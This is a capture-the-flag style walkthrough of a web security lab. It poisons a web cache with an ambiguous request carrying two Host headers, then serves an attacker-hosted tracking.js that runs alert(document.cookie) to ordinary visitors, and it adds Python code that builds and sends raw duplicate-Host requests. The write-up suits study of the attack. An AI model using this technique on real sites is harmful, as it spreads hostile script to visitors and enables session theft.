Web cache poisoning via ambiguous requests

Exploitation
We fire up Burp Suite, set up our proxy, then explore the site for a bit in order to collect some info. The request to the main page looks like this:

We notice in the response that it's loading a JavaScript resource from https://0a4f008b04b8bab18151b12b0006000a.h1-web-security-academy.net/resources/js/tracking.js. That absolute URL contains the site's own hostname, so if the back end builds it from the request's Host header, controlling that header would let us point the page at a script we host.
Let's try editing the Host header in our request and see whether the response reflects our change:

Unfortunately, this doesn't work out as expected: we get back a 504 HTTP error. The front end refuses to route a request for a hostname it doesn't recognise, so the back end never sees our value. Now let's try creating an ambiguous request instead: keep the original Host header and add a second Host header carrying our hostname. The cache validates (and keys on) the first Host header it sees, while the back end may use the second one when it builds the script URL. Here's what it looks like:

The second Host header is reflected in the script path, so we're able to trick the target into loading the resource from an arbitrary server. While experimenting, append a cache buster to the path (for example ?cb=1) so the test responses are not stored under the real home page's cache key, and watch the X-Cache response header to see whether a response came from the cache (hit) or the back end (miss). Next, let's craft a quick HTTP endpoint on a server we control (the lab's exploit server works): it must respond at /resources/js/tracking.js with the JavaScript we want the victim to run, which for this lab is alert(document.cookie).


Now we remove the cache buster and re-send the poisoned request until the response carries X-Cache: hit, meaning the home page that references our script is sitting in the cache. Loading the home page in a browser with no extra headers confirms the poisoned copy is being served to ordinary visitors. The cache entry expires roughly every 30 seconds in the academy labs, so re-poison if it lapses before the check runs:
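The following is an added example, not code from the original write-up or from PortSwigger: a small model of the discrepancy this lab relies on, plus a helper for sending the raw ambiguous request. The front end is assumed to validate and key the cache on the first Host header, and the back end is assumed to build the script URL from the last one; both are assumptions consistent with what the responses above show, not documented behaviour. EXPLOIT_HOST is a placeholder, and send_raw is only there for use against the real target (it is not called in the offline demonstration).

```python
"""Toy model of the cache/back-end Host-header discrepancy behind this lab.
Added example; the cache and back-end behaviour here are assumptions."""
import socket
import ssl

# Lab hostname taken from the write-up; the exploit hostname is a placeholder.
LAB_HOST = "0a4f008b04b8bab18151b12b0006000a.h1-web-security-academy.net"
EXPLOIT_HOST = "exploit-server.example"
SCRIPT_PATH = "/resources/js/tracking.js"


def build_request(path, hosts):
    """Build a raw HTTP/1.1 request; `hosts` may hold several Host values.

    Raw bytes are used on purpose: libraries such as `requests` keep headers in
    a dict and would collapse the duplicate Host header this attack needs.
    """
    lines = [f"GET {path} HTTP/1.1"]
    lines += [f"Host: {h}" for h in hosts]
    lines += ["Connection: close"]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_request(raw):
    """Parse the request line and headers, keeping duplicate headers in order."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return method, path, headers


def host_values(headers):
    return [value for name, value in headers if name == "host"]


def backend(path, headers):
    """Assumed back-end behaviour: the absolute script URL is built from the
    LAST Host header, which is what the lab reflects into the page."""
    host = host_values(headers)[-1]
    body = f'<html><script src="https://{host}{SCRIPT_PATH}"></script></html>'
    return {"status": 200, "body": body}


class FrontEndCache:
    """Assumed front-end behaviour: routes on and keys the cache by the FIRST
    Host header, and keeps entries for `ttl` seconds."""

    def __init__(self, ttl=30):
        self.ttl = ttl
        self.store = {}  # (host, path) -> (stored_at, response)

    def handle(self, raw, now):
        _method, path, headers = parse_request(raw)
        hosts = host_values(headers)
        if not hosts or hosts[0] != LAB_HOST:
            # Unknown host: the front end does not route it (the 504 seen above)
            return {"status": 504, "body": "", "x_cache": "miss"}
        key = (hosts[0], path)
        entry = self.store.get(key)
        if entry and now - entry[0] < self.ttl:
            return {**entry[1], "x_cache": "hit"}
        response = backend(path, headers)
        self.store[key] = (now, response)
        return {**response, "x_cache": "miss"}


def poison_and_replay(cache, now=0):
    """Poison the home page once, then replay a victim's plain request."""
    cache.handle(build_request("/", [LAB_HOST, EXPLOIT_HOST]), now)
    return cache.handle(build_request("/", [LAB_HOST]), now + 5)


def send_raw(host, raw, port=443):
    """Send a raw request over TLS to the real target (not used offline)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(raw.encode())
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    victim = poison_and_replay(FrontEndCache())
    print(victim["x_cache"], victim["body"])
```

The model also shows why the cache buster matters: a poisoned request for /?cb=1 lands under a different key and never reaches a victim who requests /, and a poisoned entry silently disappears once the TTL passes, which is why the real request has to be re-sent until X-Cache reports a hit shortly before the victim visits.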

and the lab is solved.

I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara